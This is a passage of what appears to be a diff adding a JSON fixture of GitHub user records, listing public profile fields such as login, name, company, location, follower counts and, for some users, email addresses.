"2024-09-12T02:38:46.044Z", + "nest_updated_at": "2024-09-22T20:29:34.903Z", + "name": "PLRoman", + "login": "plr0man", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24785104?v=4", + "company": "@bugcrowd", + "location": "United States", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 23, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2016-12-27T02:52:16Z", + "updated_at": "2024-05-26T15:10:06Z", + "node_id": "MDQ6VXNlcjI0Nzg1MTA0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2946, + "fields": { + "nest_created_at": "2024-09-12T02:38:47.689Z", + "nest_updated_at": "2024-09-22T20:29:34.577Z", + "name": "Tomáš Polešovský", + "login": "topolik", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/148147?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 50, + "public_gists_count": 40, + "public_repositories_count": 35, + "created_at": "2009-11-03T07:16:42Z", + "updated_at": "2024-09-10T17:47:39Z", + "node_id": "MDQ6VXNlcjE0ODE0Nw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2947, + "fields": { + "nest_created_at": "2024-09-12T02:38:48.925Z", + "nest_updated_at": "2024-09-22T20:29:35.545Z", + "name": "Pablo Tamarit", + "login": "ptamarit", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2046893?v=4", + "company": "CERN", + "location": "Geneva, Switzerland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 7, + "public_gists_count": 2, + "public_repositories_count": 26, + "created_at": "2012-07-26T14:36:50Z", + "updated_at": "2024-09-17T14:16:35Z", + "node_id": "MDQ6VXNlcjIwNDY4OTM=", + "bio": "Full-stack 🥞 software engineer 👨‍💻 working on @zenodo 📚 and @inveniosoftware 🔎", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2948, + "fields": { + "nest_created_at": "2024-09-12T02:38:50.146Z", + "nest_updated_at": "2024-09-22T20:29:33.913Z", + "name": "", + "login": "formanek", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2494913?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2012-10-05T15:30:18Z", + "updated_at": "2018-06-01T20:45:23Z", + "node_id": "MDQ6VXNlcjI0OTQ5MTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2949, + "fields": { + "nest_created_at": "2024-09-12T02:38:54.536Z", + "nest_updated_at": "2024-09-22T20:29:52.638Z", + "name": "Björn Kautler", + "login": "Vampire", + "email": "Bjoern@Kautler.net", + "avatar_url": "https://avatars.githubusercontent.com/u/325196?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 81, + "public_gists_count": 1, + "public_repositories_count": 129, + "created_at": "2010-07-07T10:45:56Z", + "updated_at": "2024-08-26T11:22:35Z", + "node_id": "MDQ6VXNlcjMyNTE5Ng==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2950, + "fields": { + "nest_created_at": "2024-09-12T02:38:55.779Z", + "nest_updated_at": "2024-09-12T02:38:55.779Z", + "name": "", + "login": "archmageirvine", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/426957?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 16, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2010-10-04T19:10:32Z", + "updated_at": "2024-07-16T22:49:24Z", + "node_id": "MDQ6VXNlcjQyNjk1Nw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2951, + "fields": { + "nest_created_at": "2024-09-12T02:39:00.393Z", + "nest_updated_at": "2024-09-12T02:39:00.393Z", + "name": "JAEHUN_LEE", + "login": "GSoJC234", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23181535?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2016-11-01T02:37:03Z", + "updated_at": "2024-08-20T16:24:52Z", + "node_id": "MDQ6VXNlcjIzMTgxNTM1", + "bio": "POSTECH", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2952, + "fields": { + "nest_created_at": "2024-09-12T02:39:02.860Z", + "nest_updated_at": "2024-09-12T02:39:04.502Z", + "name": "Jyoti Gajrani", + "login": "jyotigajrani", + "email": "jyotigajrani@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12912589?v=4", + "company": "Malviya National Institute of Technology", + "location": "Jaipur (INDIA)", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2015-06-16T13:44:29Z", + "updated_at": "2023-07-08T11:03:17Z", + "node_id": "MDQ6VXNlcjEyOTEyNTg5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2953, + "fields": { + "nest_created_at": "2024-09-12T02:39:09.978Z", + "nest_updated_at": "2024-09-12T02:39:09.978Z", + "name": "Boris Petrov", + "login": "boris-petrov", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/278940?v=4", + "company": "@profuz", + "location": "Sofia, Bulgaria", + "collaborators_count": 0, + "following_count": 24, + "followers_count": 46, + "public_gists_count": 1, + "public_repositories_count": 49, + "created_at": "2010-05-17T07:07:01Z", + "updated_at": "2023-11-06T09:00:15Z", + "node_id": "MDQ6VXNlcjI3ODk0MA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2954, + "fields": { + "nest_created_at": "2024-09-12T02:39:12.830Z", + "nest_updated_at": "2024-09-12T02:39:12.830Z", + "name": "", + "login": "plokta", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7414587?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 5, + "public_gists_count": 4, + "public_repositories_count": 7, + "created_at": "2014-04-26T15:26:14Z", + "updated_at": "2021-12-08T10:49:57Z", + "node_id": "MDQ6VXNlcjc0MTQ1ODc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2955, + "fields": { + "nest_created_at": "2024-09-12T02:39:14.454Z", + "nest_updated_at": "2024-09-12T02:39:14.454Z", + "name": "Magnus Karlsen", + "login": "mamk95", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10944333?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2015-02-10T16:29:08Z", + "updated_at": "2024-04-12T13:51:12Z", + "node_id": "MDQ6VXNlcjEwOTQ0MzMz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2956, + "fields": { + "nest_created_at": "2024-09-12T02:39:22.441Z", + "nest_updated_at": "2024-09-22T20:29:45.814Z", + "name": "Dmitry Polienko", + "login": "nigredo-tori", + "email": "nigredo.tori@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5962285?v=4", + "company": "", + "location": "Novosibirsk, Russia", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 14, + "public_gists_count": 1, + "public_repositories_count": 80, + "created_at": "2013-11-17T18:03:07Z", + "updated_at": "2024-08-17T08:06:17Z", + "node_id": "MDQ6VXNlcjU5NjIyODU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2957, + "fields": { + "nest_created_at": "2024-09-12T02:39:27.530Z", + "nest_updated_at": "2024-09-22T20:29:48.356Z", + "name": "Ullrich Hafner", + "login": "uhafner", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/503338?v=4", + "company": "University of Applied Sciences Munich", + "location": "Munich, Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 148, + "public_gists_count": 0, + "public_repositories_count": 72, + "created_at": "2010-11-30T12:54:06Z", + "updated_at": "2024-09-19T06:44:16Z", + "node_id": "MDQ6VXNlcjUwMzMzOA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2958, + "fields": { + "nest_created_at": "2024-09-12T02:39:28.795Z", + "nest_updated_at": "2024-09-12T02:39:28.795Z", + "name": "Jorge Solórzano", + "login": "jorsol", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3739977?v=4", + "company": "@ongres", + "location": "Nicaragua / Spain", + "collaborators_count": 0, + "following_count": 41, + "followers_count": 32, + "public_gists_count": 0, + "public_repositories_count": 61, + "created_at": "2013-03-01T16:12:19Z", + "updated_at": "2024-08-26T11:54:22Z", + "node_id": "MDQ6VXNlcjM3Mzk5Nzc=", + "bio": "Java developer, Postgres advocate, and K8s enthusiast.", + "is_hireable": false, + "twitter_username": "jorsol_com" + } +}, +{ + "model": "github.user", + "pk": 2959, + "fields": { + "nest_created_at": "2024-09-12T02:39:30.034Z", + "nest_updated_at": "2024-09-12T02:39:30.034Z", + "name": "BlueSkySec", + "login": "BlueSKySec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/66005070?v=4", + "company": "", + "location": "Cologne, Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 22, + "public_repositories_count": 1, + "created_at": "2020-05-27T08:29:55Z", + "updated_at": "2024-04-04T13:27:43Z", + "node_id": "MDQ6VXNlcjY2MDA1MDcw", + "bio": "", + "is_hireable": false, + "twitter_username": "BlueSkySec" + } +}, +{ + "model": "github.user", + "pk": 2960, + "fields": { + "nest_created_at": "2024-09-12T02:39:33.779Z", + "nest_updated_at": "2024-09-12T02:39:33.779Z", + "name": "", + "login": "mhnot", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37579521?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-03-20T10:58:26Z", + "updated_at": "2022-08-08T08:32:08Z", + "node_id": "MDQ6VXNlcjM3NTc5NTIx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2961, + "fields": { + "nest_created_at": "2024-09-12T02:39:35.059Z", + "nest_updated_at": "2024-09-12T02:39:35.059Z", + "name": "", + "login": "pauser0000001", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1436047?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2012-02-14T08:39:45Z", + "updated_at": "2021-05-01T10:36:42Z", + "node_id": "MDQ6VXNlcjE0MzYwNDc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2962, + "fields": { + "nest_created_at": "2024-09-12T02:39:37.894Z", + "nest_updated_at": "2024-09-12T02:39:37.894Z", + "name": "", + "login": "hiteshgargavid", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/71629585?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-09-21T07:13:42Z", + "updated_at": "2022-08-19T13:54:05Z", + "node_id": "MDQ6VXNlcjcxNjI5NTg1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2963, + "fields": { + "nest_created_at": "2024-09-12T02:39:39.523Z", + "nest_updated_at": "2024-09-12T02:39:39.523Z", + "name": "Roman Plášil", + "login": "Quiark", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59075?v=4", + "company": "", + "location": "Hong Kong", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 15, + "public_gists_count": 21, + "public_repositories_count": 69, + "created_at": "2009-03-01T12:41:42Z", + "updated_at": "2024-04-09T12:57:28Z", + "node_id": "MDQ6VXNlcjU5MDc1", + "bio": "sw dev, #crypto, #infosec, #ethereum", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2964, + "fields": { + "nest_created_at": "2024-09-12T02:39:42.402Z", + "nest_updated_at": "2024-09-12T02:39:42.402Z", + "name": "", + "login": "j0ck66", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46952968?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-01-23T06:17:21Z", + "updated_at": "2024-04-28T08:35:37Z", + "node_id": "MDQ6VXNlcjQ2OTUyOTY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2965, + "fields": { + "nest_created_at": "2024-09-12T02:39:44.495Z", + "nest_updated_at": "2024-09-12T02:39:44.495Z", + "name": "", + "login": "kaappiyan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33218858?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2017-10-30T09:10:15Z", + "updated_at": "2021-07-14T20:14:30Z", + "node_id": "MDQ6VXNlcjMzMjE4ODU4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2966, + "fields": { + "nest_created_at": "2024-09-12T02:39:46.134Z", + "nest_updated_at": "2024-09-12T02:39:46.134Z", + "name": "Wang \"LinG\" Lingxiang", + "login": "w93163red", + "email": "lingxiang.wang.2016@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7308728?v=4", + "company": "Cloudflare", + "location": "Virginia, USA", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 10, + "public_gists_count": 2, + "public_repositories_count": 70, + "created_at": "2014-04-16T00:56:27Z", + "updated_at": "2024-09-08T21:15:11Z", + "node_id": "MDQ6VXNlcjczMDg3Mjg=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2967, + "fields": { + "nest_created_at": "2024-09-12T02:39:48.596Z", + "nest_updated_at": "2024-09-12T02:39:48.596Z", + "name": "", + "login": "Meinolf-S", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/83540104?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-05-02T12:19:13Z", + "updated_at": "2022-08-02T09:01:10Z", + "node_id": "MDQ6VXNlcjgzNTQwMTA0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2968, + "fields": { + "nest_created_at": "2024-09-12T02:39:53.151Z", + "nest_updated_at": "2024-09-22T17:30:47.726Z", + "name": "Bernd", + "login": "ecki", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/361432?v=4", + "company": "@seeburger-ag ", + "location": "Karlsruhe, Germany", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 52, + "public_gists_count": 27, + "public_repositories_count": 97, + "created_at": "2010-08-11T21:06:17Z", + "updated_at": "2024-09-14T15:56:03Z", + "node_id": "MDQ6VXNlcjM2MTQzMg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2969, + "fields": { + "nest_created_at": "2024-09-12T02:39:53.954Z", + "nest_updated_at": "2024-09-12T02:39:53.954Z", + "name": "", + "login": "borramTAS", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/64269074?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2020-04-24T14:24:45Z", + "updated_at": "2024-01-21T13:51:42Z", + "node_id": "MDQ6VXNlcjY0MjY5MDc0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2970, + "fields": { + "nest_created_at": "2024-09-12T02:39:58.079Z", + "nest_updated_at": "2024-09-12T02:39:58.079Z", + "name": "Ruud de Jong", + "login": "ruud-de-jong", + "email": "ruud.dejong@visma.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6389004?v=4", + "company": "Visma Connect", + "location": "The Hague, Netherlands", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-01-13T11:35:12Z", + "updated_at": "2020-09-03T11:34:42Z", + "node_id": "MDQ6VXNlcjYzODkwMDQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2971, + "fields": { + "nest_created_at": "2024-09-12T02:39:59.401Z", + "nest_updated_at": "2024-09-12T02:40:05.563Z", + "name": "", + "login": "nkavian", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1127421?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 28, + "public_gists_count": 16, + "public_repositories_count": 73, + "created_at": "2011-10-14T03:22:11Z", + "updated_at": "2024-08-04T05:25:25Z", + "node_id": "MDQ6VXNlcjExMjc0MjE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2972, + "fields": { + "nest_created_at": "2024-09-12T02:40:01.018Z", + "nest_updated_at": "2024-09-12T02:40:01.018Z", + "name": "", + "login": "drgrog", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7420240?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2014-04-27T13:09:40Z", + "updated_at": "2024-08-16T04:53:05Z", + "node_id": "MDQ6VXNlcjc0MjAyNDA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2973, + "fields": { + "nest_created_at": "2024-09-12T02:40:02.213Z", + "nest_updated_at": "2024-09-12T02:40:02.213Z", + "name": "Thomas BERNARD", + "login": "miniupnp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1070377?v=4", + "company": "", + "location": "Paris", + "collaborators_count": 0, + "following_count": 26, + "followers_count": 164, + "public_gists_count": 10, + "public_repositories_count": 70, + "created_at": "2011-09-22T08:24:37Z", + "updated_at": "2024-07-03T22:06:27Z", + "node_id": "MDQ6VXNlcjEwNzAzNzc=", + "bio": "some experience in network programming (BSD sockets and such)\r\nretrocomputing enthousiast.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2974, + "fields": { + "nest_created_at": "2024-09-12T02:40:03.459Z", + "nest_updated_at": "2024-09-12T02:40:03.460Z", + "name": "Thomas M. DuBuisson", + "login": "TomMD", + "email": "thomas.dubuisson@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/137806?v=4", + "company": "@paxosglobal", + "location": "Portland, USA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 13, + "public_repositories_count": 56, + "created_at": "2009-10-10T06:54:10Z", + "updated_at": "2024-07-23T15:04:13Z", + "node_id": "MDQ6VXNlcjEzNzgwNg==", + "bio": "world = last $ iterate better now", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2975, + "fields": { + "nest_created_at": "2024-09-12T02:40:06.817Z", + "nest_updated_at": "2024-09-12T02:40:06.817Z", + "name": "Jason Copenhaver", + "login": "jcopenhop", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/104778402?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-05-02T14:46:43Z", + "updated_at": "2024-05-02T14:39:31Z", + "node_id": "U_kgDOBj7Kog", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2976, + "fields": { + "nest_created_at": "2024-09-12T02:40:08.074Z", + "nest_updated_at": "2024-09-12T02:40:08.074Z", + "name": "Jeeppler", + "login": "Jeeppler", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2007739?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 57, + "followers_count": 25, + "public_gists_count": 11, + "public_repositories_count": 30, + "created_at": "2012-07-19T21:19:36Z", + "updated_at": "2024-06-07T10:23:57Z", + "node_id": "MDQ6VXNlcjIwMDc3Mzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2977, + "fields": { + "nest_created_at": "2024-09-12T02:40:09.321Z", + "nest_updated_at": "2024-09-22T19:27:44.191Z", + "name": "Basil Crow", + "login": "basil", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29850?v=4", + "company": "@cloudbees", + "location": "", + "collaborators_count": 0, + "following_count": 17, + "followers_count": 57, + "public_gists_count": 5, + "public_repositories_count": 514, + "created_at": "2008-10-19T22:48:52Z", + "updated_at": "2024-09-16T18:40:49Z", + "node_id": "MDQ6VXNlcjI5ODUw", + "bio": "", + "is_hireable": false, + "twitter_username": "bcrow" + } +}, +{ + "model": "github.user", + "pk": 2978, + "fields": { + "nest_created_at": "2024-09-12T02:40:13.458Z", + "nest_updated_at": "2024-09-12T02:40:13.458Z", + "name": "Delany", + "login": "delanym", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5310238?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 88, + "created_at": "2013-08-26T07:22:15Z", + "updated_at": "2024-09-07T11:21:10Z", + "node_id": "MDQ6VXNlcjUzMTAyMzg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2979, + "fields": { + "nest_created_at": "2024-09-12T02:40:14.297Z", + "nest_updated_at": "2024-09-12T02:40:14.297Z", + "name": "Andrew Johnson", + "login": "ajohnson1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7204163?v=4", + "company": "IBM United Kingdom Limited", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2014-04-07T11:48:17Z", + "updated_at": "2023-08-23T06:50:24Z", + "node_id": "MDQ6VXNlcjcyMDQxNjM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2980, + "fields": { + "nest_created_at": "2024-09-12T02:40:15.094Z", + "nest_updated_at": "2024-09-12T02:40:15.094Z", + "name": "", + "login": "whistlexie", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10007354?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2014-11-30T06:53:31Z", + "updated_at": "2024-08-08T02:46:27Z", + "node_id": "MDQ6VXNlcjEwMDA3MzU0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2981, + "fields": { + "nest_created_at": "2024-09-12T02:40:16.368Z", + "nest_updated_at": "2024-09-12T02:40:16.368Z", + "name": "Mr. Air Jan", + "login": "mrairjan", + "email": "airidas.janavicius@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/13693387?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2015-08-07T10:51:07Z", + "updated_at": "2024-09-03T10:18:14Z", + "node_id": "MDQ6VXNlcjEzNjkzMzg3", + "bio": "Software engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2982, + "fields": { + "nest_created_at": "2024-09-12T02:40:17.191Z", + "nest_updated_at": "2024-09-12T02:40:18.392Z", + "name": "", + "login": "nchandrashekar79", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/83388759?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 19, + "created_at": "2021-04-29T05:19:06Z", + "updated_at": "2024-04-20T14:35:36Z", + "node_id": "MDQ6VXNlcjgzMzg4NzU5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2983, + "fields": { + "nest_created_at": "2024-09-12T02:40:20.410Z", + "nest_updated_at": "2024-09-12T02:40:20.410Z", + "name": "Antonio Petrelli", + "login": "apetrelli", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/966981?v=4", + "company": "", + "location": "Rome, Italy", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 26, + "created_at": "2011-08-08T17:21:02Z", + "updated_at": "2024-06-11T10:20:17Z", + "node_id": "MDQ6VXNlcjk2Njk4MQ==", + "bio": "Mostly Java developer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2984, + "fields": { + "nest_created_at": "2024-09-12T02:40:22.083Z", + "nest_updated_at": "2024-09-22T20:29:45.183Z", + "name": "John P. Bindel", + "login": "jbindel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5448121?v=4", + "company": "", + "location": "Austin", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2013-09-12T23:28:30Z", + "updated_at": "2024-02-08T16:15:58Z", + "node_id": "MDQ6VXNlcjU0NDgxMjE=", + "bio": "Software and product developer.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2985, + "fields": { + "nest_created_at": "2024-09-12T02:40:22.916Z", + "nest_updated_at": "2024-09-12T02:40:22.916Z", + "name": "", + "login": "azure247a", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/144297648?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-09-07T02:02:48Z", + "updated_at": "2023-09-07T02:02:48Z", + "node_id": "U_kgDOCJnOsA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2986, + "fields": { + "nest_created_at": "2024-09-12T02:40:23.727Z", + "nest_updated_at": "2024-09-12T02:40:27.467Z", + "name": "", + "login": "soyodream", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/151845313?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-11-23T12:44:14Z", + "updated_at": "2023-11-23T14:39:38Z", + "node_id": "U_kgDOCQz5wQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2987, + "fields": { + "nest_created_at": "2024-09-12T02:40:29.895Z", + "nest_updated_at": "2024-09-12T02:40:31.521Z", + "name": "", + "login": "jim-bentler", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/157437555?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-01-23T01:32:52Z", + "updated_at": "2024-01-23T01:32:52Z", + "node_id": "U_kgDOCWJOcw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2988, + "fields": { + "nest_created_at": "2024-09-12T02:40:33.236Z", + "nest_updated_at": "2024-09-12T02:40:33.236Z", + "name": "", + "login": "pavelorehov", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4618212?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2013-06-05T06:24:16Z", + "updated_at": "2024-02-04T11:36:41Z", + "node_id": "MDQ6VXNlcjQ2MTgyMTI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2989, + "fields": { + "nest_created_at": "2024-09-12T02:40:34.582Z", + "nest_updated_at": "2024-09-12T02:40:34.582Z", + "name": "", + "login": "haerter-tss", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/98736006?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-01-31T08:19:56Z", + "updated_at": "2024-09-11T13:39:41Z", + "node_id": "U_kgDOBeKXhg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2990, + "fields": { + "nest_created_at": "2024-09-12T02:40:35.404Z", + "nest_updated_at": "2024-09-12T02:40:35.404Z", + "name": "Slobodan Liric", + "login": "sliric", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/90183084?v=4", + "company": "TIAC", + "location": "Novi Sad, Serbia", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-09-06T08:43:19Z", + "updated_at": "2024-09-10T05:01:52Z", + "node_id": "MDQ6VXNlcjkwMTgzMDg0", + "bio": "", + 